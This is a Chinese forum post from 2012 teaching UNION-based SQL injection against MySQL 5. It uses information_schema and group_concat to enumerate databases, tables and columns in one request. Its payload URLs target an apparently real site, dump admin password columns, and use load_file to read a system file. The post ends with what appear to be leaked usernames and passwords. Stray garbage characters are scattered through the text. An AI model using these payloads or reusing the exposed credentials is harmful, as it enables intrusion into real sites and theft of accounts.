此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
H1 u: C# ?6 K0 x5 E- s+ h' o1 |但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人% v" t- U3 Z3 R6 x) z
" _; \- D( X, R6 @* K- h0 \' w j0 G- K3 N. S
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入/ q; Y' d. f" S1 H
# r. z5 p/ d7 T6 U* H
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
! M& { ?7 H$ u: f* A
4 q4 F `1 d2 Z5 ], q7 w下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
5 I( [/ n4 y( \, z7 `" F在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等/ c& ]- x. _8 }) q( W, H1 e
1 _$ r* `5 m# { }3 c9 ohttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
8 P! @6 A3 u; k3 N* l
o* c5 e+ c5 I5 b; a读出所有库:
2 z6 D7 Y* W3 n5 a; T+ Lhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
- k. ?$ R" Z- z) h
$ g. ]2 V. R: P6 B' o0 D( B! B D& ]5 ^& I
4 d0 G; B# @1 O; k: V& ^" g
读出所有表:
2 i# y* @' P$ v- p2 q5 U8 phttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
. ?+ g1 s* k) h( i: m! g" }% o" k1 H$ G; u2 R
读出所有表字段:
$ e" f/ b3 a2 a( T% @http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)6 @ N* k+ ?8 h( s0 l; X
*/ (97,100,109,105,110)为admin的ascii码 依次类推
: |+ i+ H) e; ?+ C9 p4 Q
* o1 r& A6 H+ d; O, E4 u读出所有表字段里的内容:
) Q# v2 l4 R& ~# y1 ~- Vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
\5 ?+ \- `0 t, W; W" |/ d! ]) j- ^, j b7 |4 d1 U
1 s k e/ p4 f& o- h B7 c P+ o2 S! F) @# ?$ f5 r
$ L. H8 _' p v( k, F. Q3 V# K7 Q3 m
3 R; ?2 x& ]% {% i+ a% j/ o' A( P$ U& C. L3 |' |" W4 E
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
j$ b8 k5 d+ G+ J9 n; p7 ], x! ^* a4 x) M
0 y9 Z4 U; p9 }+ R$ _5 |; ghttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
4 h, ~, Q) R: q9 P
- Y* e. x% k H3 `http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
\1 ^$ m: v S U! B
' w0 s. i5 m8 N* C
% `7 J& z. ]4 l4 l% `, b# T; nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
% c+ e% Z' r/ {0 d" h9 o! ~& X9 n% x- Z. F+ r% _9 x: s
L& Y1 R, j: W1 V5 L" `9 U. @+ n' @
webmaster:dzb521123,simlab:simadmin20043233
0 [- |% H f" m, b" `* I! w8 q5 C) L |
发表于 2012-9-13 16:37:34
收藏
支持
反对